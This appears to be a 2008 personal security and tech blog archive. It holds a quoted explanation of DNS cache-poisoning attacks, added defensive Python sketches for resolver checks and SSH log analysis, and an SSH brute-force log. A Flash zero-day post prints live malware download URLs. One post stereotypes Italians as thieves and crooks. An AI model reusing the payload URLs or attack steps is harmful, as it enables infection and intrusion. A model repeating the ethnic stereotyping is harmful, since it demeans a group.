I just described a QID attack that poisons the name server’s cache. This attack requires speed, agility and luck, because if the “real” answer happens to arrive before your spoofed one, you’re locked out. Fortunately for those of you that have a time machine, some versions of DNS provide you with another way to poison the name server’s cache anyway. To explain it, I will have to explain more about the format of a DNS packet.

DNS packets are variable in length and consist of a header, some flags and resource records (RRs). RRs are where the goods ride around. There are up to three sets of RRs in a DNS packet, along with the original query. These are:

  • Answer RR’s, which contain the answer to whatever question you asked (such as the A record that says WWW.VICTIM.COM is 1.2.3.4)

  • Authority RR’s, which tell resolvers which name servers to refer to to get the complete answer for a question

  • Additional RR’s, sometimes called “glue”, which contain any additional information needed to make the response effective.

A word about the Additional RR’s. Think about an NS record, like the one that COM’s name server uses to tell us that, to find out where WWW.VICTIM.COM is, you have to ask NS1.VICTIM.COM. That’s good to know, but it’s not going to help you unless you know where to find NS1.VICTIM.COM. Names are not addresses. This is a chicken and egg problem. The answer is, you provide both the NS record pointing VICTIM.COM to NS1.VICTIM.COM, and the A record pointing NS1.VICTIM.COM to 1.2.3.1.

Now, let’s party like it’s 1995.

Download the source code for a DNS implementation and hack it up such that every time it sends out a response, it also sends out a little bit of evil — an extra Additional RR with bad information. Then let’s set up an evil server with it, and register it as EVIL.COM. Now get a bunch of web pages up with IMG tags pointing to names hosted at that server.

Bob innocently loads up a page with the malicious tags which coerces his browser to resolve that name. Bob asks Alice to resolve that name. Here comes recursion: eventually the query arrives at our evil server. Which sends back a response with an unexpected (evil) Additional RR.

If Alice’s cache honors the unexpected record, it’s 1995 — buy CSCO! — and you just poisoned their cache. Worse, it will replace the “real” data already in the cache with the fake data. You asked where WWW.EVIL.COM was (or rather, the image tags did). But Alice also “found out” where WWW.VICTIM.COM was: 6.6.6.0. Every resolver that points to that name server will now gladly forward you to the website of the beast.

4.

It’s not 1995. It’s 2008. There are fixes for the attacks I have described.

Fix 1:

The QID race is fixed with random IDs, and by using a strong random number generator and being careful with the state you keep for queries. 16 bit query IDs are still too short, which fills us with dread. There are hacks to get around this. For instance, DJBDNS randomizes the source port on requests as well, and thus won’t honor responses unless they come from someone who guesses the ~16 bit source port. This brings us close to 32 bits, which is much harder to guess.

Fix 2:

The RR set poisoning attack is fixed by bailiwick checking, which is a quirky way of saying that resolvers simply remember that if they’re asking where WWW.VICTIM.COM is, they’re not interested in caching a new address for WWW.GOOGLE.COM in the same transaction.

Remember how these fixes work. They’re very important.

And so we arrive at the present day.

5.

Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.

----

On a side note: can stuff no longer published but found in google's cache be copyrighted?
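The two fixes described in the quoted write-up (transaction matching on QID plus source port, and bailiwick filtering), sketched as an added Python example; it is not part of the quoted article or of any resolver's code. The `Record`, `PendingQuery` and `Response` types and all function names are hypothetical, and the names and addresses are the article's own illustrations.

```python
"""Resolver-side acceptance checks: transaction matching plus bailiwick filter.

Constructed model, not a real resolver. All class and function names are
hypothetical; names and addresses are the article's illustrations.
"""
import secrets
from dataclasses import dataclass

FIXED_PORT = 53000              # assumed stand-in for a resolver that never varies its port
EPHEMERAL_PORTS = 65536 - 1024  # assumed usable range when the port is randomized


@dataclass(frozen=True)
class Record:
    name: str    # owner name, e.g. "WWW.VICTIM.COM"
    rtype: str   # "A", "NS", ...
    data: str


@dataclass(frozen=True)
class PendingQuery:
    qid: int       # 16-bit query id
    src_port: int  # UDP source port the query left from
    server: str    # address the query was sent to
    qname: str
    zone: str      # zone the queried server is authoritative for


@dataclass(frozen=True)
class Response:
    qid: int
    dst_port: int
    sender: str
    qname: str
    answer: tuple = ()
    additional: tuple = ()


def norm(name):
    """DNS names compare case-insensitively; ignore a trailing root dot."""
    return name.rstrip(".").lower()


def new_query(qname, zone, server, randomize_port=True):
    """Fix 1: QID from a CSPRNG, and a random source port unless disabled."""
    if randomize_port:
        port = 1024 + secrets.randbelow(EPHEMERAL_PORTS)
    else:
        port = FIXED_PORT
    return PendingQuery(secrets.randbelow(1 << 16), port, server, qname, zone)


def matches_transaction(q, r):
    """A response is only considered if every transaction field lines up."""
    return (r.sender == q.server
            and r.dst_port == q.src_port
            and r.qid == q.qid
            and norm(r.qname) == norm(q.qname))


def in_bailiwick(zone, name):
    """Fix 2: the owner name must be the zone itself or a name below it."""
    zone, name = norm(zone), norm(name)
    return name == zone or name.endswith("." + zone)


def cacheable_records(q, r):
    """Records a cache may keep: transaction must match, then bailiwick filter."""
    if not matches_transaction(q, r):
        return []
    return [rec for rec in r.answer + r.additional if in_bailiwick(q.zone, rec.name)]


def guess_space(randomize_port):
    """Number of (QID, port) combinations a blind off-path sender must cover."""
    return (1 << 16) * (EPHEMERAL_PORTS if randomize_port else 1)


if __name__ == "__main__":
    q = PendingQuery(0x1234, 40000, "1.2.3.1", "CXOPQ.VICTIM.COM", "VICTIM.COM")
    r = Response(0x1234, 40000, "1.2.3.1", "cxopq.victim.com.",
                 answer=(Record("CXOPQ.VICTIM.COM", "A", "1.2.3.9"),),
                 additional=(Record("WWW.GOOGLE.COM", "A", "6.6.6.0"),
                             Record("NS1.VICTIM.COM", "A", "1.2.3.1")))
    for rec in cacheable_records(q, r):
        print("cache:", rec.name, rec.rtype, rec.data)
    print("guess space, fixed port: ", guess_space(False))
    print("guess space, random port:", guess_space(True))
```

Because the bailiwick filter accepts any name under the queried zone, transaction matching is the only remaining barrier for in-zone records, which is why the size of the (QID, port) space is what a resolver operator should measure.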

Geotagging iPhone gone bad :(

Great feature: geotagging the images taken with the iPhone [already the most Popular Cameraphone on Flickr].

Just imagine that you take photos during the holiday and all you need to do is dump them in, say, google earth and all pics are shown in the correct location. Right, that was the plan. Unfortunately Apple made a couple of errors with the implementation, again.

The UIImagePicker application that is used when you email a photo from the iPhone, strips out the EXIF location data, DUH! iPhoto mutilates [strips the "Ref" tag] the EXIF geodata when resizing photos, DUH.

So what you get is third party apps that sort-of-help, like AirMe. It will upload the photo to Flickr and geotag it, but then you have to take the pic with AirMe and have NO geodata stored in the EXIF data of the photo at all, and that is bad.

Who knows, maybe if Apple would put a little less vain effort in the locking down of the iPhone they'd be able to get MMS working? Some more features in the camera? Geotagging stored correctly? How difficult is that? How come 17-year-olds CAN do that but a multi-billion company can't?
Photo source

Monday 21 July 2008

Italians...

Good thieves maybe, but crooks. Living with mama till >30. Not being able to clean their own rubbish. Lovely, but lousy car makers. And so on.

To wrap it up, even in the IT world they show up. And the pain got a name: Zibri. A thief, but then in code.

Read this to get an idea about this crook:

The following opinions are mine, and not those of the DevTeam as a whole, although many members agree with me:

Free thoughts...

There's something that's been on my chest for a while, and it's been bothering others on the team as well. The name of this particular thorn in our sides begins with the letter Z and ends with "ibri". Yes, I'm sure all of you are rolling your eyes at the "drama" we hacker "kids" are stirring up, but I'm sure if you had your work taken without permission, you would feel the same way. It's particularly galling that he is still spreading FUD on his blog in an attempt to save face. I'm going to try to address some of them in this post.

Zibri implies that our jailbreak is not "real", saying instead that our release is a "software upgrade, total internat [sic] firmware modification and custom firmware".

For him, a "real hack" works in a few minutes because it only needs to modify a few bytes here and there.

When Pwnage 1.0 was released, it was indeed the ultimate hack for the iPhone/iPod Touch. Never before had the devices been under the user's control from the very bottom up. Prior, less sophisticated jailbreaks were still subject to the whims of the kernel, which couldn't be modified because the bootloader checked its signature and refused to boot if it was incorrect.

Back in those days, the definition of "hack" above was still a feasible one, as the chain of trust ended at the kernel. Once you gained write access to the root filesystem, you could run arbitrary programs and make patches at will to many system components. Indeed, many such patches were needed, to make activation allow unapproved SIM cards, and to make Springboard display unauthorized apps.

Fast forward back to the present, and you'll see the situation has changed. Solutions that using a ramdisk simply made a change or two to the filesystem now must contend with the mighty kernel's signature checking of all installed apps and libraries. Mounting the root filesystem and modifying /etc/fstab to make it writable is quite alright, but the moment you make patches for activation or anything else, the kernel will refuse to run the modified programs, unless you can somehow steal Apple's private signing key. Furthermore, such a jailbreak would be essentially useless because the system would refuse to run any of your custom software (such as Installer.app or Cydia), again because of the lack of signatures on it.

Given the above situation, it becomes clear that if you want to use 2.0 for anything but screenshots, you either need to get ahold of Apple's signing key (start preparing your army now) or you need to patch the 2.0 kernel. Hard as we tried, we couldn't find much of an army, so we took the latter approach.

We adapted our Pwnage technique to the 2.0 firmware, using a new unreleased exploit that we'd been keeping to ourselves, in the hope that Apple wouldn't patch it. This allows us to cut the signature checks out of the device bootloaders, allowing us to remove signature checking from the kernel, and enabling you to run all the custom software and patches you please.

Please note other than my facetious army suggestions, patching the bootloaders is the _only_ way to get a functional jailbreak for 2.0. Under the aforementioned definition of "real hack", there is no such thing as a "real hack" for 2.0. I hope you agree with me by now that Pwnage, the exploit it uses, and its subsequent obliteration of the device's chain of trust, is a "real hack".

More FUD is spread by this undying rumor of "Palladium" (or TPM) being used fully on Apple's devices, making it impossible for you "to play online with legit buyers." This is nothing but uninformed nonsense, and while there is the potential for some definition of trusted computing on iPhone and iPod Touch, Apple is not using it, and they have no way to remotely distinguish your pwned device from a legitimately activated one. This should have been obvious from our examples of running App Store applications next to our custom ones, but "obvious" is a very relative term.

On an unrelated note, I and the others take issue with Zibri's definition of open source. No, Linux distributions are not stealing, but our work was not released as open source, with any kind of permissive license, so the open source he brings into the discussion is entirely irrelevant. He took our work, our private exploits (such as the unreleased one we were able to use for Pwning 2.0), and without our permission (trying to defame us with fake comments, no less) used them in his work, that he made significant amounts of money on. He did this not by selling "his work", but by portraying himself as the reasonable "dev" who fought against the tyranny of the dev team and Apple, and requesting donations to his "cause" (recall his older iphone-elite.googlecode.com and his self-righteous bashing of the dev team for accepting donations; funny how principles change). Furthermore, with his millions of hits and occasionally obscene ads, he made his site into a complete money machine. So although he did not sell our work, it is more than fair to say that he made plenty of money from it.

And as to his most recent update, I'm not really sure what to say. I'd call it the swan song, but that would imply he was a swan, which is certainly not my intention. Maybe the chicken song would be more appropriate. ZiPhone was "developed" 9 months after the iPhone release, so he's justifying his lack of releases now, okay. Once again he pushes the "real hack" idea, which we hope we've already pounded sufficiently into the ground above. We're not sure how the fact that we were so popular it took down multiple unmetered gigabit servers is a point in his favor. We've had close to a third of his total visits since last week.

I want to dedicate a special paragraph to something that's been bugging us for a while, too. The myth that ZiPhone never harmed a phone. Certainly, we all know that iPhones are almost impossible to brick, but flashing unmatched fls/eep pairs to the baseband is plain irresponsible on Zibri's part. Does he not care about messing up phones, or does he simply not know better? And the laughable WiFi fix he released for issues that he called "user error" (actually a consequence of the above design choice) where he unconditionally set every ZiPhone WiFi MAC address to 0:Z:i:b:r:i? How did he expect that to work? It doesn't take a networking genius to figure out that two such phones on the same network would cause havoc, and indeed it did.

The following few "facts" on his blog are just more FUD. Our tools can't kill iPhones, because the only way to kill an iPhone through software (and even then just the radio) is to flash an incomplete image as the S-Gold bootloader. Apple cannot remotely kill pwned iPhones because as I mentioned earlier, it has no way to detect which iPhones are pwned.

I'm not sure why he goes on to say that you should be satisfied with Apple's AppStore. It certainly contains many good programs, but to quote Zibri just a couple of weeks earlier:

As of today you will have 2 choices:
1) Believe in the community and don't upgrade to 2.0
2) Say goodbye to Installer and freedom and upgrade.

So are you suggesting we say goodbye to freedom now? I guess we can't expect much from someone who made a reputation for himself by denouncing the devteam for accepting donations (not even soliciting them) and who now has a website full of ads, exhortations to donate, and very little content? Now we have given you a nice opportunity to upgrade to 2.0, use the AppStore _and_ use community apps. If he really wanted the good of the community, why is he not recommending it?

I would normally just ignore his entries, but as many still look at Zibri as an authority in the scene, I felt the need to dispel some of the FUD he was spreading, and finally denounce his pathetic attempts to stay relevant. Posting the latest root filesystem key after we release PwnageTool? PwnageTool exposes all the keys right within its plist files. And if he knew about the DFU exploit all along, as he implies, why didn't he take advantage of it? We would like to see him write up an article on how it all works, just to prove that Zibri knows all.

Thank you for your patience reading this. We will continue working hard on providing quality hacks and software, but please, to anyone who's tempted, stop spreading bullshit about us and our work. source

Friday 18 July 2008

How big is your I-EGO?



My I-EGO is pretty big, people tell me. But how big is it really? Time to find out!

Enter your name & domain and let the www.egosurf.org do the rest.

My 'mokum von Amsterdam' EGO is a mere 4700 points but I am sure yours is a lot bigger :P

Shabat shalom!

Thursday 17 July 2008

I just text to say...

I would like a pile of these, right next to the complaint & request notes.


A big pile so I could formalize & incorporate the process in my daily life.


Now who would deserve one signed by you?

Tuesday 15 July 2008

We are ING!

Shht!

Saturday 12 July 2008

BattleField 2: new patch 1.5 and 3 new maps

It is still secret, the current internal BETA for the long awaited BF2 1.5 patch is currently running in Spain and guess what:

3 new maps will be released with it [act of G*d clause applies].

The names of the maps I cannot reveal but there will be at least one _you_ will like :P

Thursday 10 July 2008

Queuing for the iPhone 2.0

In Rotterdam there is a [modest] queue for the T-Mobile shop that will start selling the iPhone 2.0 from 00:00 sharp.

500 phones are available to those that have no friends, no home, no sex and no lust for beer.

Mine will fall out of the air real soon now, but I can not say I am half as tense as I was with the original iPhone a year ago.

Wednesday 9 July 2008

SSH scanning on the rise. DENYHOSTS


DenyHosts blocked 44 new ssh user scanning hosts in the last 13 hours. That is a lot.

Normally, days with >5 new hosts caught by my lone sensor are remarkable; it happens no more often than 4 times a month. This month has been truly busy, however: July 1st 10 new addresses, July 3rd 14, whereas in the whole month of June there were 2 days with >5 [6 & 8 on the 28th & 30th. A busy month globally] with a grand total of 28 for the whole month.

Nothing advanced either, like the botnet-like scanning in May.


This is for those hosts who made it to the largest blacklist of all times.

Monday 7 July 2008

My users are smarter than yours!

1. Firefox 221 56.81%
2. Internet Explorer 123 31.62%
3. Safari 34 8.74%
4. Opera 8 2.06%
5. Mozilla 2 0.51%
6. Netscape 1 0.26%

Tuesday 1 July 2008

Google's Street View spycar clocked in Amsterdam, Holland



I think this is a first: a Google car in Amsterdam. Photo taken on the 1st of July 2008 on the Gaasperdammerweg, Amsterdam, after I picked up the car coming out of the Huigenbos [I know, all these streets do not sound like Amsterdam... but it is, technically speaking].



In a year or so you can see me doing silly :P

Tuesday 24 June 2008

I should have...

...written about our first meeting, where you said "I used to be a real looker" and I took a photo of your legs that looked good, not to say great.

I should have written about the conversations we had.

I should have written about the nail biting, before and during the football game.

I should have because the moments mattered to me.

I should have because now they took you, after your screaming alarmed the neighbor, after your neighbor alarmed the police, after the police kicked in the door, after the police warned the ambulance, after the ambulance took you away, after the police took your cellphone, after the doctors called that after the first operation they saw little hope, and after I tried to contact your daughter, and after the second call from the doctors who said there was little hope and after that I found your daughter was informed... but all was too late.

All was too late, but disaster, 'cause it was too early. It should not have been.

Kiek, I should have...

Danke viel...



Photo taken on Monday the 23rd of June. Someone 'forgot' something :P

Thursday 19 June 2008

BackTrack3 to be released, RSN

And they do it again: the final release of BackTrack 3 will hit the net any moment now.

Ever since I met Max at some stint at a client, I have been impressed with his bright mind and unbelievable control over the matters he works on. He did an assessment of the wlan setup I had designed and he pinpointed the weaknesses [some publicly known, others, well 'new'] and the strong points, which made up a nice report for management.

Anyway, BT3 is about to hit the tubes soon and now you know first :P

Wednesday 18 June 2008

Reasons why I do...

Add high-speed wireless data to the hottest kid on the block and me being regularly in Amsterdam with a keyboard within reach...

So this couple looks like a good reason to spend a couple of euros :D

Tuesday 17 June 2008

Reasons I do not.

Download Day 2008

Firefox 3 is about to hit the Internet tubes in a couple of hours. Great, or is it?

The fact that the Google Browser Sync project is not taking calls nor displaying any word about support of their essential FF extension for FF 3 has made me decide to NOT upgrade.

As much as I liked test driving FF3 [all beta's and RC's] I just do not want to browse without GBS, unless I am given no option.

So here are my apologies to the Firefox 3 team: sorry! But I will retract my pledge to download FF3 until GBS is available and will continue to use FF2.

Here's the Google team's reply:
Thanks for trying out Google Browser Sync and for all of your feedback. It was a tough call, but we decided to phase out support for Browser Sync. Since the team has moved on to other projects that are keeping them busy, we don't have time to update the extension to work with Firefox 3 or to continue to maintain it.

For those of you who want to continue to use Firefox 2, we'll maintain support for old versions of Google Browser Sync through 2008. After that, we can recommend a few other products that scratch a similar itch. We hope that one of them works for you:

Mozilla Weave [labs.mozilla.com] from Mozilla Labs—Offers bookmark and history synchronization across computers.

Google Toolbar for Firefox [toolbar.google.com]—Store your bookmarks online and access them from any computer online.

Foxmarks Bookmark Synchronizer [addons.mozilla.org]—Synchronizes your bookmarks across all computers where it is installed.

Regards,
The Google Team


But personally I do not want to change too much at a time so I will sit back, enjoy GBS for the coming couple of months, wait till FF3's bugs are ironed out and then, maybe, switch away from GBS to one of the above mentioned 'replacements'.

Friday 30 May 2008

This is sweet :D

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thank Zac Bedell.

Wednesday 28 May 2008

Flash: the format everybody loves to hate [at least should]

Prime time for our beloved FLASH player again: a 0-day has been actively exploited the last couple of days, as reported by Security Focus and SANS; Adobe knows not much more ATM. It is served as a file with the jpg extension that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg


That in the end, downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.

Tuesday 27 May 2008

Arun Sarin is leaving Vodafone

What a pity!

We lost the most out of touch CEO ever whose ideas, visions and quotes were always mind-bending.

Thursday 22 May 2008

gmail filter multiple domains


For sometime I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.

It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:

Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl OR @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I actually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".

Photo by Code Poet

Monday 19 May 2008

Times are changing...


I am from the time that dental correction was only cool when done invisibly. You would have your holes plugged, most of the time with 'amalgam' but that was for the poor [me]. The cooler people used plastic in the colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

Friday 16 May 2008

SSH brute force botnet

Nice, I must have been asleep the last couple of days. Since May 11 02:41:53 my logfiles [which never sleep] started logging more 'advanced' brute force ssh attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]

1209 attempts for 654 "invalid users" in 49 busy hours from [grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.
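Aggregating across sources is what exposes a run like the one logged above, where no single address makes enough attempts to trip a per-address threshold. An added example, not part of the original post: the sample lines are copied from the May 14 entries above, and the threshold, window and function names are assumptions chosen for illustration.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Lines copied from the May 14 part of the log excerpt above.
SAMPLE_LOG = """\
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"Failed \S+ for invalid user (?P<user>\S+) from (?P<ip>[0-9a-fA-F:.]+) port \d+"
)


def parse(log_text, year=2008):
    """Return time-sorted (timestamp, user, source) tuples; syslog omits the year."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return sorted(events)


def longest_wordlist_run(events):
    """Longest run of consecutive attempts whose usernames never go backwards
    alphabetically: a sign of many hosts walking one shared, sorted user list."""
    best = run = 1 if events else 0
    for (_, prev, _), (_, cur, _) in zip(events, events[1:]):
        run = run + 1 if cur >= prev else 1
        best = max(best, run)
    return best


def campaign_report(events, per_ip_threshold=5, window=timedelta(hours=1), min_sources=5):
    # Distinct sources, i.e. what `sort -u` counts; `uniq -u` would keep only
    # the addresses that occur exactly once.
    per_ip = Counter(ip for _, _, ip in events)
    # What a per-address rule sees: only sources at or above the (assumed) threshold.
    caught = sorted(ip for ip, n in per_ip.items() if n >= per_ip_threshold)
    # Sliding window anchored at each event: how many different sources were
    # active together, regardless of how few attempts each one made.
    peak_sources = peak_attempts = 0
    for i, (start, _, _) in enumerate(events):
        in_window = [e for e in events[i:] if e[0] - start < window]
        sources = {ip for _, _, ip in in_window}
        if len(sources) > peak_sources:
            peak_sources, peak_attempts = len(sources), len(in_window)
    return {
        "attempts": len(events),
        "sources": len(per_ip),
        "users": len({user for _, user, _ in events}),
        "max_per_source": max(per_ip.values(), default=0),
        "caught_by_per_ip_rule": caught,
        "missed_sources": len(per_ip) - len(caught),
        "peak_sources_in_window": peak_sources,
        "peak_attempts_in_window": peak_attempts,
        "wordlist_run": longest_wordlist_run(events),
        "distributed": peak_sources >= min_sources,
    }


if __name__ == "__main__":
    for key, value in campaign_report(parse(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

On these lines no source makes more than two attempts, yet fourteen sources are active within one hour and the usernames advance alphabetically across them.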

Thursday 15 May 2008

Euro 2008 champion: Russia

Today is speculation day :D

Switzerland - Czech Republic 2 - 1
Romania - France 0 - 2
Portugal - Turkey 1 - 1
Netherlands - Italy 3 - 2
Czech Republic - Portugal 2 - 1
Italy - Romania 2 - 1
Switzerland - Turkey 3 - 2
Netherlands - France 0 - 2
Switzerland - Portugal 1 - 2
Netherlands - Romania 2 - 1
Turkey - Czech Republic 0 - 0
France - Italy 1 - 2

Austria - Croatia 1 - 1
Spain - Russia 1 - 2
Germany - Poland 1 - 0
Greece - Sweden 1 - 3
Croatia - Germany 1 - 2
Sweden - Spain 0 - 2
Austria - Poland 3 - 1
Greece - Russia 1 - 2
Poland - Croatia 1 - 1
Greece - Spain 0 - 2
Austria - Germany 3 - 4
Russia - Sweden 2 - 1

Switzerland - Austria 3 - 1
Germany - Czech Republic 2 - 0

France - Spain 3 - 1
Russia - Italy 2 - 1

Switzerland - Germany 3 - 1
Spain - Russia 0 - 1

Switzerland - Russia 2 - 3

Euro 2008 champion: Russia

Speculation SSL Ubuntu & Thawte

Hmm, considering the fact that Mark Shuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's SSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Ubuntu is a large Certificate Authority

Does that insinuate all Thawte certificates are ready for a review? :P

A great day for scripters!

The last months have been good for the security market. SPAM rose [it has been for 30 years but who is counting?], BOTNETS grew, CC snooping went bigger and the list was nicely extended with two, well, astounding issues within the last 24 hours.

